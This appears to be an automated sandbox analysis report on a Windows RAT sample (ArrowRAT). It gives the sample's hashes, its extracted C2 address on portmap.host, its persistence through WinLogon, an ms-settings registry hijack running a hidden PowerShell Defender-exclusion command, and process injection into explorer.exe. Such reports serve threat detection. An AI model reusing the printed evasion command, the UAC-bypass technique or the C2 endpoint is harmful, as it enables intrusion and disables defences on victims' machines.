Analysis
-
max time kernel
128s -
max time network
128s -
platform
windows7_x64 -
resource
win7-20240611-en -
resource tags
arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system -
submitted
20-06-2024 01:21
Behavioral task
behavioral1
Sample
332bc09f4e96b4c92fba644fa6b49585.exe
Resource
win7-20240611-en
Behavioral task
behavioral2
Sample
332bc09f4e96b4c92fba644fa6b49585.exe
Resource
win10v2004-20240508-en
General
-
Target
332bc09f4e96b4c92fba644fa6b49585.exe
-
Size
158KB
-
MD5
332bc09f4e96b4c92fba644fa6b49585
-
SHA1
56fe70b2cfa0507fd1c6cb67b7456bba2e93bc39
-
SHA256
876f5ce0e85c7bd4fd29f3b29333e3b6d130306a53ba4a9dff02151cfc8bda63
-
SHA512
49c0a97e8f2b4a11f0261722c1c8495f9d8d438ad63a6f0f4bef0661b4ff2f05a0672caf6264d7d03fe91752def7d346b7d0ad752a0f9f8296859a543c7d10fa
-
SSDEEP
3072:MbzgH+0OoCthfbEFtbcfjF45gjryKKqH6JY2doszEmQotEPPcfPUJO8Y:Mbzge0ODhTEPgnjuIJzo+PPcfPUk8
Malware Config
Extracted
arrowrat
Client
runderscore00-37568.portmap.host:37568
qxzqapnkK
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
332bc09f4e96b4c92fba644fa6b49585.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, C:\\Users\\Admin\\AppData\\Local\\Temp\\SOGYywQjD\\ZamZUaDqR.exe" 332bc09f4e96b4c92fba644fa6b49585.exe -
Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
Processes:
explorer.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 11 IoCs
Processes:
explorer.exe332bc09f4e96b4c92fba644fa6b49585.exedescription ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000_CLASSES\ms-settings 332bc09f4e96b4c92fba644fa6b49585.exe Set value (str) \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000_CLASSES\ms-settings\shell\open\command\ = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\\Users\\Admin\\AppData\\Local\\Temp\\SOGYywQjD\\ZamZUaDqR.exe'" 332bc09f4e96b4c92fba644fa6b49585.exe Key created \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000_Classes\Local Settings explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Key created \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000_CLASSES\ms-settings\shell\open\command 332bc09f4e96b4c92fba644fa6b49585.exe Key created \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000_CLASSES\ms-settings\shell 332bc09f4e96b4c92fba644fa6b49585.exe Key created \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000_CLASSES\ms-settings\shell\open 332bc09f4e96b4c92fba644fa6b49585.exe Set value (str) \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000_CLASSES\ms-settings\shell\open\command\DelegateExecute 332bc09f4e96b4c92fba644fa6b49585.exe Key created \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe -
Suspicious behavior: EnumeratesProcesses 22 IoCs
Processes:
332bc09f4e96b4c92fba644fa6b49585.exepid Process 1168 332bc09f4e96b4c92fba644fa6b49585.exe 1168 332bc09f4e96b4c92fba644fa6b49585.exe 1168 332bc09f4e96b4c92fba644fa6b49585.exe 1168 332bc09f4e96b4c92fba644fa6b49585.exe 1168 332bc09f4e96b4c92fba644fa6b49585.exe 1168 332bc09f4e96b4c92fba644fa6b49585.exe 1168 332bc09f4e96b4c92fba644fa6b49585.exe 1168 332bc09f4e96b4c92fba644fa6b49585.exe 1168 332bc09f4e96b4c92fba644fa6b49585.exe 1168 332bc09f4e96b4c92fba644fa6b49585.exe 1168 332bc09f4e96b4c92fba644fa6b49585.exe 1168 332bc09f4e96b4c92fba644fa6b49585.exe 1168 332bc09f4e96b4c92fba644fa6b49585.exe 1168 332bc09f4e96b4c92fba644fa6b49585.exe 1168 332bc09f4e96b4c92fba644fa6b49585.exe 1168 332bc09f4e96b4c92fba644fa6b49585.exe 1168 332bc09f4e96b4c92fba644fa6b49585.exe 1168 332bc09f4e96b4c92fba644fa6b49585.exe 1168 332bc09f4e96b4c92fba644fa6b49585.exe 1168 332bc09f4e96b4c92fba644fa6b49585.exe 1168 332bc09f4e96b4c92fba644fa6b49585.exe 1168 332bc09f4e96b4c92fba644fa6b49585.exe -
Suspicious use of AdjustPrivilegeToken 12 IoCs
Processes:
332bc09f4e96b4c92fba644fa6b49585.exeexplorer.exedescription pid Process Token: SeDebugPrivilege 1168 332bc09f4e96b4c92fba644fa6b49585.exe Token: SeShutdownPrivilege 1108 explorer.exe Token: SeShutdownPrivilege 1108 explorer.exe Token: SeShutdownPrivilege 1108 explorer.exe Token: SeShutdownPrivilege 1108 explorer.exe Token: SeShutdownPrivilege 1108 explorer.exe Token: SeShutdownPrivilege 1108 explorer.exe Token: SeShutdownPrivilege 1108 explorer.exe Token: SeShutdownPrivilege 1108 explorer.exe Token: SeShutdownPrivilege 1108 explorer.exe Token: SeShutdownPrivilege 1108 explorer.exe Token: SeShutdownPrivilege 1108 explorer.exe -
Suspicious use of FindShellTrayWindow 27 IoCs
Processes:
explorer.exepid Process 1108 explorer.exe 1108 explorer.exe 1108 explorer.exe 1108 explorer.exe 1108 explorer.exe 1108 explorer.exe 1108 explorer.exe 1108 explorer.exe 1108 explorer.exe 1108 explorer.exe 1108 explorer.exe 1108 explorer.exe 1108 explorer.exe 1108 explorer.exe 1108 explorer.exe 1108 explorer.exe 1108 explorer.exe 1108 explorer.exe 1108 explorer.exe 1108 explorer.exe 1108 explorer.exe 1108 explorer.exe 1108 explorer.exe 1108 explorer.exe 1108 explorer.exe 1108 explorer.exe 1108 explorer.exe -
Suspicious use of SendNotifyMessage 17 IoCs
Processes:
explorer.exepid Process 1108 explorer.exe 1108 explorer.exe 1108 explorer.exe 1108 explorer.exe 1108 explorer.exe 1108 explorer.exe 1108 explorer.exe 1108 explorer.exe 1108 explorer.exe 1108 explorer.exe 1108 explorer.exe 1108 explorer.exe 1108 explorer.exe 1108 explorer.exe 1108 explorer.exe 1108 explorer.exe 1108 explorer.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
332bc09f4e96b4c92fba644fa6b49585.exepid Process 1168 332bc09f4e96b4c92fba644fa6b49585.exe -
Suspicious use of WriteProcessMemory 49 IoCs
Processes:
332bc09f4e96b4c92fba644fa6b49585.exeexplorer.exedescription pid Process procid_target PID 1168 wrote to memory of 1108 1168 332bc09f4e96b4c92fba644fa6b49585.exe 28 PID 1168 wrote to memory of 1108 1168 332bc09f4e96b4c92fba644fa6b49585.exe 28 PID 1168 wrote to memory of 1108 1168 332bc09f4e96b4c92fba644fa6b49585.exe 28 PID 1108 wrote to memory of 2640 1108 explorer.exe 29 PID 1108 wrote to memory of 2640 1108 explorer.exe 29 PID 1108 wrote to memory of 2640 1108 explorer.exe 29 PID 1168 wrote to memory of 2724 1168 332bc09f4e96b4c92fba644fa6b49585.exe 30 PID 1168 wrote to memory of 2724 1168 332bc09f4e96b4c92fba644fa6b49585.exe 30 PID 1168 wrote to memory of 2724 1168 332bc09f4e96b4c92fba644fa6b49585.exe 30 PID 1168 wrote to memory of 2724 1168 332bc09f4e96b4c92fba644fa6b49585.exe 30 PID 1168 wrote to memory of 2900 1168 332bc09f4e96b4c92fba644fa6b49585.exe 31 PID 1168 wrote to memory of 2900 1168 332bc09f4e96b4c92fba644fa6b49585.exe 31 PID 1168 wrote to memory of 2900 1168 332bc09f4e96b4c92fba644fa6b49585.exe 31 PID 1168 wrote to memory of 2900 1168 332bc09f4e96b4c92fba644fa6b49585.exe 31 PID 1168 wrote to memory of 2896 1168 332bc09f4e96b4c92fba644fa6b49585.exe 32 PID 1168 wrote to memory of 2896 1168 332bc09f4e96b4c92fba644fa6b49585.exe 32 PID 1168 wrote to memory of 2896 1168 332bc09f4e96b4c92fba644fa6b49585.exe 32 PID 1168 wrote to memory of 2896 1168 332bc09f4e96b4c92fba644fa6b49585.exe 32 PID 1168 wrote to memory of 2768 1168 332bc09f4e96b4c92fba644fa6b49585.exe 33 PID 1168 wrote to memory of 2768 1168 332bc09f4e96b4c92fba644fa6b49585.exe 33 PID 1168 wrote to memory of 2768 1168 332bc09f4e96b4c92fba644fa6b49585.exe 33 PID 1168 wrote to memory of 2768 1168 332bc09f4e96b4c92fba644fa6b49585.exe 33 PID 1168 wrote to memory of 2772 1168 332bc09f4e96b4c92fba644fa6b49585.exe 34 PID 1168 wrote to memory of 2772 1168 332bc09f4e96b4c92fba644fa6b49585.exe 34 PID 1168 wrote to memory of 2772 1168 332bc09f4e96b4c92fba644fa6b49585.exe 34 PID 1168 wrote to memory of 2772 1168 332bc09f4e96b4c92fba644fa6b49585.exe 34 PID 1168 wrote to memory of 2716 1168 332bc09f4e96b4c92fba644fa6b49585.exe 35 PID 1168 wrote to memory of 2716 1168 332bc09f4e96b4c92fba644fa6b49585.exe 35 PID 1168 wrote to memory of 2716 1168 332bc09f4e96b4c92fba644fa6b49585.exe 35 PID 1168 wrote to memory of 2716 1168 332bc09f4e96b4c92fba644fa6b49585.exe 35 PID 1168 wrote to memory of 2336 1168 332bc09f4e96b4c92fba644fa6b49585.exe 36 PID 1168 wrote to memory of 2336 1168 332bc09f4e96b4c92fba644fa6b49585.exe 36 PID 1168 wrote to memory of 2336 1168 332bc09f4e96b4c92fba644fa6b49585.exe 36 PID 1168 wrote to memory of 2336 1168 332bc09f4e96b4c92fba644fa6b49585.exe 36 PID 1168 wrote to memory of 2892 1168 332bc09f4e96b4c92fba644fa6b49585.exe 37 PID 1168 wrote to memory of 2892 1168 332bc09f4e96b4c92fba644fa6b49585.exe 37 PID 1168 wrote to memory of 2892 1168 332bc09f4e96b4c92fba644fa6b49585.exe 37 PID 1168 wrote to memory of 2892 1168 332bc09f4e96b4c92fba644fa6b49585.exe 37 PID 1168 wrote to memory of 2612 1168 332bc09f4e96b4c92fba644fa6b49585.exe 38 PID 1168 wrote to memory of 2612 1168 332bc09f4e96b4c92fba644fa6b49585.exe 38 PID 1168 wrote to memory of 2612 1168 332bc09f4e96b4c92fba644fa6b49585.exe 38 PID 1168 wrote to memory of 2612 1168 332bc09f4e96b4c92fba644fa6b49585.exe 38 PID 1168 wrote to memory of 2964 1168 332bc09f4e96b4c92fba644fa6b49585.exe 39 PID 1168 wrote to memory of 2964 1168 332bc09f4e96b4c92fba644fa6b49585.exe 39 PID 1168 wrote to memory of 2964 1168 332bc09f4e96b4c92fba644fa6b49585.exe 39 PID 1168 wrote to memory of 2964 1168 332bc09f4e96b4c92fba644fa6b49585.exe 39 PID 1168 wrote to memory of 2540 1168 332bc09f4e96b4c92fba644fa6b49585.exe 40 PID 1168 wrote to memory of 2540 1168 332bc09f4e96b4c92fba644fa6b49585.exe 40 PID 1168 wrote to memory of 2540 1168 332bc09f4e96b4c92fba644fa6b49585.exe 40 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\332bc09f4e96b4c92fba644fa6b49585.exe"C:\Users\Admin\AppData\Local\Temp\332bc09f4e96b4c92fba644fa6b49585.exe"1⤵
- Modifies WinLogon for persistence
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1168 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵
- Boot or Logon Autostart Execution: Active Setup
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1108 -
C:\Windows\system32\ctfmon.exectfmon.exe3⤵PID:2640
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client runderscore00-37568.portmap.host 37568 qxzqapnkK2⤵PID:2724
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client runderscore00-37568.portmap.host 37568 qxzqapnkK2⤵PID:2900
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client runderscore00-37568.portmap.host 37568 qxzqapnkK2⤵PID:2896
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client runderscore00-37568.portmap.host 37568 qxzqapnkK2⤵PID:2768
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client runderscore00-37568.portmap.host 37568 qxzqapnkK2⤵PID:2772
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client runderscore00-37568.portmap.host 37568 qxzqapnkK2⤵PID:2716
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client runderscore00-37568.portmap.host 37568 qxzqapnkK2⤵PID:2336
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client runderscore00-37568.portmap.host 37568 qxzqapnkK2⤵PID:2892
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client runderscore00-37568.portmap.host 37568 qxzqapnkK2⤵PID:2612
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client runderscore00-37568.portmap.host 37568 qxzqapnkK2⤵PID:2964
-
-
C:\Windows\System32\ComputerDefaults.exe"C:\Windows\System32\ComputerDefaults.exe"2⤵PID:2540
-